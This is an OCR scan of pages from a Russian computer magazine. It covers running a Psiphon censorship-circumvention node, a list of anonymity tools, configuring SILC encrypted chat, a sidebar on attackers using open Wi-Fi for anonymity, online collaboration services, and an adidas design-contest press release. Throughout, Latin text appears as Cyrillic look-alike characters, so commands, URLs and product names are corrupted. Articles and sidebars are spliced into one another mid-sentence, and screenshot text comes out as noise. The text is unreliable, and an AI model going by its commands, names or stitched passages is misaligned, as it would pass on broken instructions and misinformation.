живающие в свободных и адекватных странах (вроде России], помогают 
менееудачливым братьям по разуму из других стран получить свобод- 
ный доступ к Глобальной Сети. Без ограничений, цензуры и шейперов. 
РзірЬоп работаетчерез компьютерные сети, междуучастниками которыхуста- 
новлены доверительные отношения. Имеются провайдеры рзірЬоп, которые 
устанавливают, контролируют и обслуживают рзірЬоп-сервер (рзірЬопосІе] в 
той стране, где нет цензуры, и есть пользователи рзірЬоп (рзірЬопіІез), которые 
входят в систему и получают доступ к заблокированному серверу из страны, 
где интернет проходит цензуру. Любому, кто столкнулся с подобными ограни- 
чениями, подсилу найти списокпсифонод и, попользовавшись настройками, 
получить возможность выходить в ѴѴеЬ без всякихзапретов. 

Что представляетсобой псифоноддля пользователя? Обычный веб- 
прокси — специальный сайт, с дополнительной панелью для ввода адре- 




Программы 
для анонимности 

Существует целый ряд программ для обеспечения частной жиз- 
ни в Сети, которые рекомендует ІгЦегпеІ Зесигку бог Сіѵіі Зосіегу 
Г ѵѵѵѵѵѵ.сіѵІ 5 ес.ог{г) — некоммерческая организация, занимающа- 
яся защитой прав человека в интернете. Возьми на заметку. 
Наскіііѵізто.сот. Сайт международной группы хакеров, 
защитников прав человека, юристов, а также парней, 
организовавших Сик оГБеаб Соѵѵ — известной хакерской 
группировки и группы компьютерной безопасности. В свое 
время они зарелизили Тограгк — фичу, сочетающую браузер 
РоыаЫе РігеЬох на базе РігеЬох Беег Рагк и преднастроенный 
ТОК. Вся комбинация могла запускаться с ІІЗВ-флешки. 
Другой их релиз — ЗсатегСЬаі:, представляющий собой ІМ- 
систему с шифрованным чатом. Говоря об этой группе, труд- 
но не вспомнить и другие проекты. Например, р2р-систему 
5іх/Роиг Г зоигсебог^е.пеіі/ргоіесГзЛіхбоіігк предназначен- 
ную для развертывания и поддерживающую собственную 
реализацию крипто-протокола. 

РогіаЫеаррз.сот. Коллекция наиболее часто используемых 
программ, среди которых есть ТЬипсіегЬігсі с поддержкой РСР. 
ТЗкгагеасЬ.сот. Решение для безопасного серфинга по Инету, 
реализованное в виде плагина к МогШа, а также самостоя- 
тельного приложения. Радует, что прога бесплатна и вполне 
способна конкурировать с такими шароварными продуктами, 
как 5ге$апо5 Іпіегпеі Апопут. 

Ргее§а1;е. Шифрованный доступ в Интернет. Сомнительный 
софт, особо популярный в Китае. 

ОрепоШсе.ог§. Бесплатный набор программ (аналогичный 
М5 (Жісе). К сведению: текстовые документы, сохраненные в 
формате .осй, могут быть зашифрованы по умолчанию. 



са и фреймом, где отображается содержимое запрашиваемого ресурса. 
Таким образом, для использования не нужно ничего, кроме обычного 
браузера. 

Какорганизоватьсвой псифоноди предоставлять друзьям доступ к 
за блокирован ному для них контенту? Вот один из вариантов: 
ОКачаемсам РзірЬопдля Винды. Там же находятся версиядля І_іпих,а 
также исходники приложения. 

2) Во время процедуры установки, наверняка, начнет ругаться твой 
файрвол. Необходимо разрешить нашей программе выходить в Сеть и 
разблокировать процесс. Далее придется напрячь извилины и приду- 
мать уникальное имя для своего псифонода. 

3) На следующем этапе программа определиттвой ІР-адрес, проверит 
доступность 443-порта (для 551_). Если он занят, тебе потребуется вруч- 
ную указать любой свободный порт. 

4) Установка завершена — можно смело жать «Біагі». Как только 
твоя нода перешла в состояние « О N » , проверь ее доступность, об- 
ратившись на адрес по синей ссылке в верхней части управления. 
Заметь, что II В Ь для запроса имеет следующий вид: кддрз : // 
ір : 443 / имя (соответственно, введенное тобой на втором этапе]. 
Если все пашет корректно, то в браузере должна открыться серти- 
фикационная страница, где клиенту надо принять принять серти- 
фикат и ввести данные для авторизации. Кстати о них! Аккаунты 
для клиентов создаются с помощью кнопки «Абб» (логин, пароль, 
электронная почта, полное имя]. 

Минусы технологии сразу не проявляются, но прозрачны. У недобросо- 
вестных операторов ноды существует возможность отслеживать, какие 
ресурсы посещают их псифониты. Если основываться на принципах 
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^Открываю доступ в свободный мир для друзей из Китая. Чуть не забыл 
что имя рзірбоп-сервера обязательно должно быть уникальным 



& т щ ш т іа ® ѣ 



взаимного доверия, оператор по идее не разглашает эту информацию, 
чтобы не подвергать людей опасности. Ситуация сродни истории о 
прослушивании выходных нод ТОР-сервера, который ты сам сн и фа ешь 
при использовании различными пользователями. Еще нетакдавно 
шведский специалист по безопасности (ОЕгапдесІ Зесигііу) подобным 
образом собрал около сотни аккаунтов электронных почт делегатов 
международных посольств и правительств. Второй скользкий момент 
Рзірбоп состоит в том, что провайдеру ноды необходимо каким-то 
хитрым, а главное, безопасным способом передать клиенту данные 
для подключения . А ведь без дополнительных разъяснений это может 
оказаться крайне сложным... 



г МОМЕНТЫ ОБЩЕНИЯ 

Помимо непосредственно серфинга, в Сети особенно остро стоит воп- 
рос о конфиденциальности общения. Нынешний андеграунд знает 
много различных ІМ -систем, способных обеспечить секретность 
разговоров. Попадаются даже собственные разработки, например, 
N00 (проект отід’а]. 

Западные товарищи активно используют та кую штуку, как5ІІ_С [ ѵѵѵѵѵѵ. 

). Зесиге Іпіегпеі Ыѵе Сопіюгепсіпд, если расшифровать, 

— это клиент серверной технологии для крипто-переписки в режиме 
реального времени. Самое интересное втом, что она распространяется 
в виде связки, состоящей из отдельно сервера, который ты сам можешь 
установить для своих парней, и официального клиента под Ыпих/ІІпіх/ 
Мас/ѴѴіпсІоѵѵз. В особых случаях можно вообще обойтись без установ- 
ленного клиента на машине. Представь, что мы организуем собственный 
ѴР5/Ѵ05. Подключение к нему производится поЗЗН, на который мы 
вполне можем установить 51 ИС-сервер и туда же — клиент под никсы. 
Теперь, если ты оказался в такой ситуации, когда нет возможности вос- 
пользоваться официальным клиентом (или специальным плагином для 
известного мессенжера Рібдіп), то ты можешь простозайти позащищен- 
ному 55 Н и за юзать консольный клиент. Получаем двойное шифрование 
своей переписки: 55Н + 5ІЮ! Вижу, ты уже загорелся —тогда приступа- 
ем к настройке. 

Ксожалению, сервер на данном этапе доступен только для Ыпих/ІІпіх, 
поэтому придется поднять соответствующий сервак. Установка пре- 
дельно проста — грш -і для бинарного пакета, либо распаковатьархив 
и собрать стандартными . /сопіідиге&таке&таке іпзЕаІІ.По 
дефолту все файлы пакета будут находиться в /изг/іосаі/зііс/, а 
его конфиги — /еСс/зіІс/. Учти, что сервис биндитпортТСР 706, а это 
требует соответствующих привилегий (гооі/дгапіесі): 



# дгоираскі зііссі 

# изегасісі — д зііссі -з /Ъіп/зЪ. — сі /изг/іосаі/зііс зііссі 

# зііссі — запуск сервера 




Беспроводные сети 
на службе у хакера 

Как ни крути, а беспроводные сети сейчас особенно часто ис- 
пользуются злоумышленниками для обеспечения анонимности. 
Несложно понять, почему. Хакер получает чужой ІР, закрепленный 
за совершенно другим человеком или, что еще лучше, организа- 
цией. В беспроводном окружении хромает физический уровень 
безопасности (отсутствует видеомониторинг, группы безопаснос- 
ти) . Даже в случае, когда на периметре присутствует специальная 
ѴѴГОЗ-система (о которой шла речь в одной из старых моих статей 
«На чем палятся вардрайверы») — а это уже само по себе редкость 
— опытный злоумышленник может воспользоваться )аттіп§- 
атакой на один из сенсоров и остаться незамеченным. Оставлять 
свою беспроводную сеть открытой — благородно и при грамотной 
настройке вполне безопасно, но исключать возможность исполь- 
зования ее в только что описанных целях нельзя. 

Чтобы идентифицировать другдруга и начать шифрованный канал, 5ИС 
оперируетсистемой ключей. Каждый ключ имеет следующий формат: 

ІЖ — имя пользователя 

НЫ — хост (можно указывать ІР) 

Ш — имя (ФИО) 

Е — электронная почта 
С — сокращение страны (КБ, БЕ, ЕЕ) 

Создание («выписка») ключей производится с помощью команды: 
#/изг/1оса1/зі1с/зЬіп/зі1ссі -С /изг/ІосаІ/зіІс/еСс - 
ісіепЦіІіег= "ІЖ=зкѵо 2 , НЫ=зі1с . магсігіѵег . ги , КЫ=АпсІгед 
Котагоѵ, Е=кошагоѵ@іЦ(іеІепсе . ги , С=КІІ" . Чем-то это 
напоминает штатные запросы бзциегу к Асбѵе 0 і гесіогу, где указы- 
ваются различные параметры. Сгенерированная пара ключей будет 
находиться в директории, указанной после флага «-С». Протокол 5ИС 
по умолчанию генерирует свой открытый ключ 51 ЕС, однако легко под- 
держивает ключ 55Н2, ОРЕЫРСР, х. 509. Клиент в свою очередь может 
создать публичный ключ сам, воспользовавшисьутилитой риНудеп, 
которая распространяется вместе с нашим любимым 5514-клиен- 
том РиТТѴ ( ѵѵѵѵѵѵ.сЫагк.дгеепепсІ.огд. и к/~5діаіЬа т/риНу ]. При этом 
приватный ключ остается у него для авторизации. Ксозданию ключа 
надо отнестись ответственно, потому что при несовпадении логина 
владельца тебя просто не пустит на сервер. Если у тебя нет ключа и ты 
впервые пытаешься подключиться к серверу, он сгенерит его для тебя 
автоматически, но при этом за просит та к называемую раззрб газе. Она 
указана в конфиге/еІс/зіІссІ.сопС отдельно для админа и клиента. Вот, 
собственно, и вся настройка. В ряде моментов 5 НС сильно напомина- 
ет ІРС. Кстати говоря, многие взломщики и специалисты по безопас- 
ности по-прежнему продолжают тусить на приватных конференциях, 
используя именно эту систему. Излюбленное место тусовки хакеров 
— каналы с поддержкой 55Е и сертификатов. Можно еще больше 
укрепить безопасность, если взять на вооружение ІпѵізіЫе ІРС Ргсцесі 
(ИР. і пѵІ5І Ыеі р.5ои гсеіогде. пеі/і і р ) . Это реализация «роіпИо роіпІ» 
протокола шифрования, который эксплуатируется внутри прокси 
между сервером и клиентом. Соответствующая прокся подымается на 
Іосаііюзк : 6667. 

Ш ПОЛНАЯ АНОНИМНОСТЬ? 

Если говорить начистоту, то никакие инструменты и условия не обеспе- 
чаттебе 100% анонимность. Всегда остается небольшая вероятность, что 
на каком-то из серверов ведутся логи, а в каком-то месте тупо отключено 
шифрование. Но если использовать комбинации старых проверенных 
способов и новых взятых на вооружение приемов, можно вполнеуспеш- 
но сохранять инкогнито. □С 
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СТЕПАН «5ТЕР» ИЛЬИН 

/ 5ТЕР@САМЕІ_АЫ0.КІІ / 



ПОЛЕ 



НЕ ВОИН 



СРЕДСТВАДЛЯ СОВМЕСТНОЙ РАБОТЫ ОНЛАЙН 



Любой мало-мальски сложный проект одному не поднять. Нет, конечно, 
можно постараться и через пару лет выдать полусырой продукт, но зачем? 
Ведь гораздо веселее, быстрее и эффективнее работается в команде. А чтобы 
делать это умеючи, придется выделить время и освоить полезные инстру- 



менты. 



мное слово «соІІаЬогаІе» сейчас популярно как никогда. 
Поддержка «совместной работы», аименнотаконопере- 
водится, означает, что сервис предоставляет возможность 
одновременной работы сразу для нескольких пользо- 
вателей, которые трудятся над решением общей задачи. Причем, у 
каких-то сервисов коллективный труд является лишь одной из опций, 
а у других — непосредственным предназначением. К сожалению, 
«соІІаЬогаІе» реальную возможность работать коллективом обоз- 
начает далеко не всегда, а среди сервисов, по-настоящему поддер- 
живающих совместную работу, бесплатны лишь некоторые. Можно 
долго хвалить всемирно известный инструмент Вазесатр [ ѵѵѵѵѵѵ. 
ЬазесатрЬд.сот ). предназначенный для управления проектами, но 
весь мед портитложка дегтя. За пользование им придется выклады- 



вать $24 в месяц — и это, замечу, минимум! С полгода назад взявшись 
наладить порядок в делах, я принялся за поиск полезных и бесплатных 
инструментов, которые помогли бы помочь в коллективной работе. И 
вотчтоуменя получилось. 

^ 1. РАБОТА С ДОКУМЕНТАМИ: 6006І.Е 00С5 

Работая в издательстве, имеешь дело стекстами постоянно. Обыч- 
ный ѴѴогб, установленный практически везде, отлично справляется 
со всеми задачами, но сильно обламывается, когда речь идет о 
коллективной работе. Система рецензирования, хоть и удобна, 
и позволяет вносить правки разными людьми, но не дает самого 
главного — работать с документом одновременно нескольким поль- 
зователям. Ктомуже, возникает серьезная проблема, когда нужно 
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О Загрузить ' Сделать общими ^ Перенес тить е т ®*Сіфьг 



І* Удалитъ Пвр'енчвноввть До по л ниггельше действия * 



В ^ Все записи 

4 Прнншеэшгмне 
^ Открыто мной 
Й С пометкой 
Скрыто 
(Ц корзина 

№ Сдараненные результаты поиск® 
В ЁЭ асе папки 

_] Файлы ано палой 

Ё-і січі (элементов; 7} 

ЁЭ хакер (элементов: 7) 

В По іипу файлов 

В Доступ совнвсгко с пользователям 

X АгііІтзЛскк (1 элемент] 

X АгАиапоск (і элемент} 

X Мет (і эгеиент) 

X Мвт.го5поѵ5№ «1 зпвиент) 
X Котэгоѵ Элементов. 10) 

X Мад«іпе ■! элемент) 

X нікііюгг И элемент) 

X Ралгіа доп (1 элемент 



ПсИІИН Соиі,іссміьвідост>ті 



ВЧРД 

Идеи для тем 
О Идеидпн журнала: 

П ЭТОМ мггяцг 

о ДпяИЛЛЛЛ/2: 

Вопросы В РАО 
® йе 

В ЭТОМ ГОДУ 

43 0*ФУ*над (КОД Ь1 №і&1 

Волрасьідпч Ивана Медведева 

У ЛодКгісжні дпяХакерті 

_п Подкаст в дол Хамера 

-О»* 

□ Вычислительные комплексы н 
.О Для РАО: 

43 По поведу с,ийік релнклв.След 
Мумнідоіомеіл і|>екер 
С Разные тайней 
4^ 1. что делать ес пи диск витый? 
ц* Битые дікыі тновый флілт 
Щ спнсо»«10.0г08 
А Рабом шідшіском 
В ы Орать: ?се 42, НН одною 



Ойаійе, л 

и, РІУВЭ 
я, иііаіин 

Агіеггі. -■ 

Аіегл.гоьлоѵзкіГ, л 

я 

я 

я 

я 



Дата + 

24 нояО. л 

24 ноле, л 

1 0 ноле. * 

1 В нояб л 

12 ноле. ІЛ»к> 

25 окт, ц 
21 оит. п 

21 СенТ. **вт 

21 Еёнт Аі н№ га-і 
3 сент, ч 

24 ИЮНЯ я 
20 нюня * 

1 4 ИЮНЯ * 

22 мая л 
15 мая л 

23 нарта * 

12 марта 
10 Ф#ар 
ійНіряп * 

Отображаются элементы 142 из 42 




> Ііпкз 

• Ооодіе Оос5: 
с1ос5.доод[е.сот 

• Театег: Іеатег.ги 

• ВиЬЫ.из:_ 
уууууу.ЬиЬЫ.из 

• ОаЬЫеВоагсІ: 
ѵѵѵѵѵѵ.сІаЬЫеЬоагсІ.сопп 

• Тѵѵ і сі сііа : ѵѵѵѵѵѵ. 
[ѵѵісісііа.сот 

• Ѵуеѵѵ: ѵуеѵѵ.сопп 

• ЕіЬеграсІ: 

еібеграсі.сот 



предоставить кому-то доступ к документам, находя- 
щимся внутри локалки издательства. Так какже быть? 

На помощь приходит Ѳоодіе Оосз, о котором не слышал, 
пожалуй, только ленивый. 

Офисный пакет от Ооодіе работает через браузер, доку- 
менты хранит прямо на своих серверах, и при этом (а это 
самый смак!) он изначально рассчитан на коллективную 
работу. Каждое внесенное в файл изменение отобра- 
жается в специальной базе данных, и любую правку 
в нужный момент можно отменить. С авторами порой 
вполне удачно получается вместе редактировать текст, 
уточняя некоторые моменты и по ходу дела рецензируя 
отдельные моменты с указанием ошибок. А между ре- 
дакторами расшарен специальный документ, в котором 




• АззетЫа: 
аззетЫа.сот 




> іггіо 

Голосовую конфе- 
ренцию проще всего 
организовать через 
Экуре, воспользовав- 



мы делимся друг с другом идеями для статей. Впрочем, 
подобные возможности удобно использовать и вне 
работы. Прямо сейчас Ыікііог планирует новогодние 
каникулы, оформляя все в виде электронной таблицы с 
указанием различных расходов, и предоставляет доступ 
к документу всем участникам поездки. 

Чуть меньшими возможностями по коллективной работе об- 
ладаетаналогичный проект — 2оЬоѴѴгііег [ ѵѵѵѵѵѵ. гобоѵѵгііе г. 
сот ). Зато во всем остальном, включая интерфейс, он 
максимально приближен кѴѴогсГу. 

Н 2. РАБОТА В НЕБОЛЬШОЙ КОМАНДЕ: ТЕАМЕК 

Как показывает практика, нелегко организовать даже свою 
собственную работу, а если речь идето команде, пусть и 
маленькой, то задача усложняется в разы. Без помощи 
специальных средств и программ тут обойтись трудно. Но 
увлеченному и сильно загруженному человеку сложно вы- 
делить время (да и зачастую найти в себежелание) освоить 
подходящий инструмент. А ведь это должен сделать каждый 
участниккоманды... 



группируются в проекты и дают друг другу задания. В 
проектах бывают управляющие (они видят все задания, 
созданные в рамках проекта) и исполнители (они видят 
только те задания, которые касаются непосредственно 
их). Все участники могут писать сообщения (коммента- 
рии) в рамках заданий и прикладывать к ним какие-то 
файлы. В качестве примера можно взять разработку 
сайта. В ней участвуют менеджер, дизайнер, версталь- 
щик и программист. Четыре человека с помощью Театег 
могут взаимодействовать между собой: дизайнер шлет 
верстальщику исправленные картинки, программист пи- 
нает админа, менеджер рулит всеми. Крайние сроки (они 
же — дедлайны) отображаются на красивом календаре, а 
сообщения от коллег по цеху рассылаются помимо самой 
системы еще и по е-таіі, I СО и Оббегу. Театегтакже 
используется в редакции НС — для управления работой 
над выпуском ОѴО-приложения. 

Н 3. СОВМЕСТНЫЙ БРЕЙНШТОРМ: ВиВВЬ.УБ 



шись соответствую- 
щей опцией. Причем, 
помимо других 
пользователей, 
можно подключить 
кого угодно, позвонив 
по обычному номеру 
с помощью платной 
услуги Зкуреоиі. 
КЗкуре есть не- 
сколько плагинов 
для зегееп-збагіпд: 
к примеру, Ііпуіе 
( ЫірзТ/ехІгаз.зкуре. 
сот/907/ѵіеѵѵ ). 
Компанию, его раз- 
работавшую, кстати 
говоря, купила сама 
ІВМ. 



Именно поэтому я особенно люблю и всем всячески реко- 
мендую Театег— очень простой веб-сервис для органи- 
зации командной работы над проектом. Чтобы освоиться с 
Театег’ом, потребуется одна чашка кофе: не успев допить, 
ты уже успеешь разобраться, что к чему. 

Все устроено примерно следующим образом: люди 



Подчас на словах не очень-то и просто объяснить, что 
нужно сделать команде. Проще все нарисовать. Втаких 
случаях не обойтись без графического сопровождения и, 
в частности, МіпбМарз (так называемых «карт разума») 

— способа изложения мыслей с помощью графических 
схем. Эти схемы крайне удобны и для проведения мозго- 
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на онлайн-доске несколькими пользователями] есть несколько 
профильных сервисов. Так, ОаЬЫеВоагсІ основан на технологии 
Ріех и полностью предназначен для рисования от руки. Понятно, что 
нарисовать, скажем, ровный круг нетак-то просто, однако сервис 
распознает очертания основных фигур и автоматически преобразует 
изображение, чтобы фигура выглядела «красивой и опрятной». Ты 
можешь создавать и свои собственные тул киты (наборы объектов 
рисования]. Например, я дважды с ее помощью рисовал эскизы 
интерфейса. 

ТѵѵібсІІа, в отличие от ОаЬЫеВоагсІ, испол ьзует технологи ю А]ах, но 
предоставляет куда большие возможности для проведения сове- 
щаний онлайн. На рабочую область можно помещать иллюстрации, 
текст, различные документы и математические форумы. А по ходу 
дела — просматривать ѴѴеЬ-сайты, оставляя на нужной области 
заметки, быстро обмениваться файлами, устраивать голосовые 
беседы. Мечта! 

К 5. РАСШАРИВАЕМ РАБОЧИЙ СТОЛ: ѴѴЕѴѴ 



вых штурмов, где каждый из участников может не только предложить 
свой вариант, но и прокомментировать чужой, указав на слабые 
стороны или даже внеся необходимые изменения. 

Благодаря бесплатному сервису ВиЬЫ. из, коллективные б рей н штор- 
мы с построением наглядных майндмэпов теперь доступны прямо из 
браузера. Нарисовать свой майндмэп может любой желающий, после 
чего экспортировать его в один из графических форматов или сохра- 
нить на сервере для просмотра коллегами. Во всей красе оценить 
сервис получится лишь после регистрации: после нее ты сможешь 
работать над одной и той же схемой одновременно с другими поль- 
зователями. Надо сказать, что интерфейс написан на АбоЬе Ріех’е и 
поэтому работает очень шустро, без каких-либо глюков, характерных 
для сложных А]ах-приложений. 

Еще одним бесплатным сервисом для создания «карт памяти» является 
ѵѵѵѵѵѵ.тіпсІ42.сопп . Он позволяетсоздавать майндмепы, более прибли- 
женные кстандарту [ еп.ѵѵікіресІіа.огд/ѵѵікі/МіпсІ тар ] и, помимо прочего, 
поддерживает горячие клавиши. 

Н 4. ПРОВОДИМ ВСТРЕЧИ ОНЛАЙН: ОАВВІ.ЕВОАКО И Т\ЛП001_А 

Тратить время на бесконечные встречи в офисе, да еще вытаскивать из 
дома удаленных сотрудников? Неееее, это недля нас. Ужмы-то знаем, что 
сейчас вообще можно отказаться от совещаний в редакции. Благодаря 
Зкуре’у, легко можно общаться с фрилансером хоть из Зимбабве — при 
этом не платя за разговор ни копейки, а для дополнительных объяснений 
использовать вспомогательные инструменты. Сразу приходит на ум офис- 
ная доска, на которой размашисто рисуешь маркером, объясняя очередную 
гениальную идею. Реализация подобной офисной доски есть и в Сети. 
Лично мнеудобнее использовать подобные вещи прямо через 
браузер. Для ѴѴЬйеЬоагсІіпд’а (так называется процесс рисования 



Ѵуеѵѵ — это тоже сервис для проведения совещаний онлайн. У него 
есть одна замечательная опция, за которую разработчикам хочется 
сказать отдельное спасибо. Прямо из браузера с ее помощью можно 
предоставить доступ к своему рабочему столу! Получаем практичес- 
ки полный эффект присутствия с участием до 20 человек: исполь- 
зовать ѵѵЫіебоагсІіпд — это раз, обмениваться файлами — два, 




Сервисы 
одной строкой 




соІІаЬесііг.сот — простой, но уникальный сервис, позволяющий 
одновременно редактировать программный код с подсветкой 
синтаксиса. Неплохой инструмент, чтобы пошагово объяснить что- 
либо коллеге или сокурснику. 

ѵ\л/\гѵѵ.тіпбтеІ5Гег.сот — еще одно средство для коллективного 
брейншторма. 

ѵ\ллл/ѵ.ЛіагІ 5 еб.сот — простой сервис, который поможет назначить встре- 
чу в удобное для всех участников время (крайне актуален, чтобы 
собрать всех редакторов на редколлегию, — Прим. ЗГер’а) . 
ѵѵѵѵѵѵ.^оо^Іе.сот/пощЬооІ — удобный блокнот, разработанный 
Соо§1е, для записи всякой всячины несколькими людьми. 
ѵ\ллплтЪе5іі4с.сот — похожий на Місгозоіт Ѵізіо инструмент для рисо- 
вания блок-схем прямо в браузере. 

тѵтѵ.Ьох.пеГ — сервис для хранения файлов онлайн и совместной 
работы с ними. 
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показывать презентации — три, совместно править файлы — четы- 
ре, наглядно показывать что-то и объяснять, передавая изображе- 
ния со своего рабочего стола — пять. Для работы необходимы лишь 
установленный Ріа зЬ последней версии и баѵа. 

Н 6. РЕДАКТИРОВАНИЕ ТЕКСТА 
В РЕАЛЬНОМ ВРЕМЕНИ: ЕТНЕКРАБ 




СопггоІ Аппашеетепі 
СотгоІ Аесеи 



^іл 0*Ьег5 



пел Рагйсірапк 



СиіголпіігаЫе НідЫідНсіпд 



Іосаіе Раічісіратз 



кіи 

У 

У ссчЧі 

У ЮМ- 



ВГОѴѴЗІ 



Сервис Еібеграб — это воплощение гениальности и простоты, разрабо- 
танное группой ех-сотрудников Ооодіе. Когда требуется что-то придумать, 
прикинуть и совместными усилиями оформить в виде текста, — лучшего 
инструмента не найти. Все просто: ты создаешь новый документ и по- 
лучаешь ссылку, которую отправляешь остальным участникам импро- 
визированного совещания — в итоге, каждый получает доступ кодному 
единственномутекстовому редактору. Все строки пронумерованы, можно 
писать текст... А весь фокус втом, что внесенные изменения в реальном 
времени отображаются у каждого из участников, — и отображаются раз- 
ными цветами. Если совместить это с голосовой конференцией, можно 
быстро набросать нужный текст или даже программный код. Для созда- 
ния промежуточных версий реализована серьезная система ревизий. 



• чат для общения всехучастников проекта; 

• развитые средства совместной работы над изображениями; 

• графики выполнения ключевых шагов (мейлстоунов) и другое. 

При этом неважно, придерживаешься литы популярных сейчас 
АдіІе/5СВІІММ манер ведения проекта или просто разрабатываешь 
что-то для себя в свободное время — всегда можно настроить среду 
так, как хочется. Все компоненты, включая систему контроля версий, 
доступны с панели управления и устанавливаются простым кликом. 
Для продвинутых пользователей в АззетЫа.сот тоже найдется 
сюрприз. Если ты используешь встроенный модультикетов (а не 

Тга с], как я, то рано или поздно тебе может надоесть делать скриншо- 
ты багов в ПО или на сайте, потом их обрабатывать и прикреплять к 
ти кетам как файл. 

Оказывается, у сервиса есть кнопочка «Таке зсгеепзбоі», кото- 
рая запустит специальную баѵа- про грамму для автоматического 
снятия скриншотов. И таких мелочей, в лучшую сторону отличающих 
АззетЫа.сот от других средств, наберется много. Например, ин- 
теграция с микро-блоггингом Тѵѵіііег.сот — теперь все твои друзья 
будут знать, как продвигается проект, и не ста нут задавать глупых 
вопросов, когда релиз (это же касается и менеджеров или заказчи- 
ков). А бекап на сервера Атагоп 53 спасет, даже если полетятжест- 
кие диски у всех участников команды. Самым крутым разработчикам 
припасли подробно документированный АР I для работы с сервисом 
программным образом и даже плагин для Есіірзе, позволяющий 
работать с задачами и ти кета ми прямо в ЮЕ. 

Помимо всего прочего, АззетЫа.сот может быть отличным инстру- 
ментом для фрилансеров и стартапов, так как содержит встроенные 
средства распределения задач, ведения своего портофолио, поиска и 
набора сотрудников для определенных работ и учет оплат. За некоторые 
возможности, кстати, придется платить тебе самому. Так, бесплатные 
Аккаунты мо гут быть толь ко открытыми (то есть, код и внутренняя 
переписка доступны всем участникам), да и места, выделяемого под 
хранение кода в системе контроля версий и файловое хранилище, не 
так и много, - всего 200 Мб. Но стоитзаплатить (исходя из расчета, 2 
1150 в месяц на участника проекта), как и места станет больше (до 5 Гб), 
и расширенные возможности появятся (тот самый бекап на Атагоп 53). 
Если ты не создаешь нечто секретное (да-да, не пишешьубийцу Ооодіе 
или новую ОС, которая порвет ѴѴі псіоѵѵз) , то все возможности для тебя 
будут бесп л атн ы м и ! ~нг 



I утѵ 



. зуияч | 



Н 7. СОВМЕСТНАЯ РАЗРАБОТКА: А55ЕМВІ.А.С0М 

Рассказывая о Театег, я акцентировал внимание на том, что это 
очень простой сервис, практически не 
требующий времени для освоения. Но если 
речь идет о серьезном проекте по разра- 
ботке ПО, то тут уже сам Бог велел выделить 
уделить время, чтобы разобраться с заме- 
чательным сервисом АззетЫа.сот. Наш 
автор — Александр Лозов ю к, который по 
долгу службы управляет командой разра- 
ботчиков и ведет крупный проект, объяснил 
почему оно того стоит. 

Итак, что это такое? АззетЫа.сот — это 
полноценный сервис для команды кодеров, 
занимающихся разработкой ПО. Для проекта 
ты получаешь любые нужные средства: 

• системы контроля версий (на выбор: 5ѴІ\І, ОН, 

Мегсигіаі, атакже интеграция с внешним 5ѴЫ 
или сервисом ОНЬаЬ); 

• вики для ведения документации (однако, этот 
компонент самый слабый и неудобный из всех, 
если начистоту); 

• встроенную с и сте мути кето в или совмещен- 
ную с популярным пакетом Тгас, дополненным 
собственным компонентом просмотра кода 
(Собе Вгоѵѵзег); 
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1 Ш ж. ,'ІІІЯ 9ШШІІ 

1 НОЯБРЯ КОМПАНИИ А0ЮА5 И ОАМЕБАІЧЮ СОВМЕСТНО С АГЕНТСТВОМ САПАТ ; 



ЗАВЕРШИЛИ ОЫ-иЫЕ ПРОЕКТ АйШАЗ 0КІ6ІМАБ5 СНАІ_І_ЕМ6Е, В РАМКАХ 






КОТОРОГО ДИЗАИНЕР-ЛЮБИТЕЛЬ, ПРОФЕССИОНАЛ ИЛИ ИЗВЕСТНЫЙ ЧЕЛОВЕК; 
МОГЛИ ПОЧУВСТВОВАТЬ СЕБЯ ЧАСТЬЮ КОМАНДЫ АБЮАЗ И НАРИСОВАТЬ 
НА МАЙКЕ АБЮАЗ 0НІ6ІЫАЕ5 СВОЙ РИСУНОК. 



изайн-конкурс асіісіаз Огідіпаіз СЬаІІепде - это 
совместный проект асіісіаз и медиакомпании 
Ѳатеіапсі, созданный для поклонников бренда 
Огідіпаіз, которые мыслят нестандартно, любят со- 
четать спортивный стиль с модными тенденциями и 
всегда готовы проявить свою оригинальность, разра- 
ботав собственный дизайн футболки асіісіаз Огідіпаіз. 

За 2 месяца в конкурсе приняли участие 
20 000 человек, которые создали более 10 000 уни- 
кальных дизайнов футболок асіісіаз Огідіпаіз. В кон- 
курсе принимали участие три креативные группы: 
«Лига любителей», «Лига профессионалов» и «Лига 
СеІеЬгіГез», а победители проекта определялись 
путем открытого онлайн голосования на сайте Ьіір-.// 
ѵѵѵѵѵѵ.а сі ісІазогідіпаІзсГіаІІепд.ги. Для создания прин- 
тов на футболках асіісіаз были созданы максимально 
комфортные условия. Участники «Любительской» лиги 
находили все необходимое для своего эксклюзивного 



рисунка на сайте и использовали инструменты для 
рисования опііпе. Участники лиги «Профессионалов» 
могли загрузить свой оригинальный принт в любом 
привычном для них формате. Посетители магази- 
нов асіісіаз не менее охотно участвовали в конкурсе, 
разрисовывая выставленные в магазине бумажные 
футболки. В группе сеІеЬгШез креативили и фантази- 
ровали в стиле асіісіаз модельер Максим Черницов, 
актер Константин Крюков, художник Андрей Бартенев 
и многие другие. 

Подведение итогов и церемония награждения 
состоялись 12 ноября в столичном клубе «Джусто». 
Представитель асіісіаз Ольга Кириллова поздравила 
победителей от лица компании, пообещала поддержи- 
вать молодых и талантливых людей и пригласила всех 
присутствующих участвовать в последующих креатив- 
ных проектах асіісіаз. Показ футболок с Огідіпаіз прин- 
тами сопровождался выступлением одетых в конкур- 
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сные футболки брейк-дансеров и горячими танцами 
гостей. В этот вечер в клубе царила атмосфера 
асіісіаз Огідіпаіз. Представитель столичного бомонда 
художник Андрей Бартенев улыбался у барной стойки, 
глядя на пришедшую молодежь. 

Наступил ответственный момент, ради которого 
все присутствующие собрались на вечеринке. Веду- 
щий объявляет имена победителей. В «любительской» 
лиге победителем стал Роман Малько из Москвы, сре- 
ди «профессионалов» лучшей была признана Наталья 
Щербань (Ріокзу) - дизайнер из Санкт-Петербурга. 
Кроме главного приза - поездки в Германию в голо- 
вной офис асіісіаз, ребятам вручили медали и памят- 
ные призы от асіісіаз. Поскольку у асіісіаз всегда все 
серьезно, Роман и Наталья произнесли свои первые 



«оскаровские» речи, поблагодарив компанию асіісіаз и 
рассказав о своем видении дизайна будущего. 

В честь победителей и для всех пришедших 
играл известный своими «жирными» сэтами предста- 
витель хип-хоп коалиции РІаттаЫеЬеаІз ди-джей 
Тасбсз. На «сладкое» на сцену вышли инди-рок группа 
йоі: ОазЬ, признанная «открытием года». 

По масштабности привлечения обществен- 
ности к дизайну продукции, проект асіісіаз Огідіпаіз 
сЬаІІепде оставил далеко позади своих конкурентов, 
только в интернет за дизайны победителей проголо- 
совало более 20 000 человек. В конкурсе участвовало 
около 10 000 работ из них в финал вышли 25 авторов с 
40 работами. 
